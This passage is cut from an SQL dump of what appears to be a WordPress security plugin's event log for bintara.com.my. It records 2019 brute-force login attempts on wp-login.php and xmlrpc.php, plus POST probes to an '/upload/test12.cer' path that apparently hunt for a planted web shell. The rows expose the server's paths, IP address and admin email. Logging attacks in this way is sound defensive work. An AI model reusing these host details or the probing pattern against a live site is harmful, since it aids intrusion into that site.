23:45:10',18203808,19500544,'https://bintara.com.my/xmlrpc.php',1,0,'140.127.218.200'),(23332,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.85.65.211\";s:11:\"REMOTE_PORT\";s:5:\"48052\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRxWB90bn5mtr-PXqrEUwAAAEE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566863705.114\";s:12:\"REQUEST_TIME\";s:10:\"1566863705\";}}','notice','2019-08-26 23:55:06','2019-08-26 23:55:05',17683432,19174112,'https://bintara.com.my/wp-login.php',1,0,'103.85.65.211'),(23333,0,'brute_force','invalid-login::username-user2','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"user2\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.85.65.211\";s:11:\"REMOTE_PORT\";s:5:\"48404\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRxW4ir4pgxiIHnHK4swwAAAco\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566863707.2238\";s:12:\"REQUEST_TIME\";s:10:\"1566863707\";}}','notice','2019-08-26 23:55:08','2019-08-26 23:55:07',18204552,19503448,'https://bintara.com.my/xmlrpc.php',1,0,'103.85.65.211'),(23334,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"131.108.103.230\";s:11:\"REMOTE_PORT\";s:5:\"53446\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRzlYir4pgxiIHnHK4s6AAAAc4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566864278.044\";s:12:\"REQUEST_TIME\";s:10:\"1566864278\";}}','notice','2019-08-27 00:04:39','2019-08-27 00:04:38',17681680,19174008,'https://bintara.com.my/wp-login.php',1,0,'131.108.103.230'),(23335,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"109.251.248.90\";s:11:\"REMOTE_PORT\";s:5:\"56094\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWR1zB90bn5mtr-PXqrGkQAAAE0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566864844.7461\";s:12:\"REQUEST_TIME\";s:10:\"1566864844\";}}','notice','2019-08-27 00:14:05','2019-08-27 00:14:05',17689472,19176256,'https://bintara.com.my/wp-login.php',1,0,'109.251.248.90'),(23336,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"109.251.248.90\";s:11:\"REMOTE_PORT\";s:5:\"56094\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWR1zB90bn5mtr-PXqrGkQAAAE0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566864844.7461\";s:12:\"REQUEST_TIME\";s:10:\"1566864844\";}}','notice','2019-08-27 00:14:06','2019-08-27 00:14:05',17851000,19176256,'https://bintara.com.my/wp-login.php',1,0,'109.251.248.90'),(23337,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"162.243.7.171\";s:11:\"REMOTE_PORT\";s:5:\"57867\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWR3zR90bn5mtr-PXqrIBAAAAEg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566865357.4734\";s:12:\"REQUEST_TIME\";s:10:\"1566865357\";}}','notice','2019-08-27 00:22:38','2019-08-27 00:22:37',17681744,19174016,'https://bintara.com.my/wp-login.php',1,0,'162.243.7.171'),(23338,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"158.69.112.178\";s:11:\"REMOTE_PORT\";s:5:\"47856\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWR8ER90bn5mtr-PXqrKgAAAAEo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566866449.9278\";s:12:\"REQUEST_TIME\";s:10:\"1566866449\";}}','notice','2019-08-27 00:40:51','2019-08-27 00:40:50',17683544,19174480,'https://bintara.com.my/wp-login.php',1,0,'158.69.112.178'),(28744,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//upload/test12.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"117.48.235.34\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"117.48.235.34\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/upload/test12.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/upload/test12.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@@je4vBmywCERyagfmiAAAAQY\";s:12:\"REDIRECT_URL\";s:18:\"/upload/test12.cer\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"61873\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/upload/test12.cer\";s:10:\"SCRIPT_URL\";s:18:\"/upload/test12.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@@je4vBmywCERyagfmiAAAAQY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798669.6472\";s:12:\"REQUEST_TIME\";s:10:\"1571798669\";}}','notice','2019-10-23 02:44:31','2019-10-23 02:44:30',35269048,37071544,'http://bintara.com.my//upload/test12.cer',1,0,'117.48.235.34'),(28743,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//upload/test12.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"123.149.238.28\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"123.149.238.28\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/upload/test12.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/upload/test12.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa@@fCGcwml6EYyVWZHRCAAAAJU\";s:12:\"REDIRECT_URL\";s:18:\"/upload/test12.cer\";s:11:\"REMOTE_ADDR\";s:13:\"218.88.204.80\";s:11:\"REMOTE_PORT\";s:5:\"61422\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/upload/test12.cer\";s:10:\"SCRIPT_URL\";s:18:\"/upload/test12.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa@@fCGcwml6EYyVWZHRCAAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571798653.0351\";s:12:\"REQUEST_TIME\";s:10:\"1571798653\";}}','notice','2019-10-23 02:44:15','2019-10-23 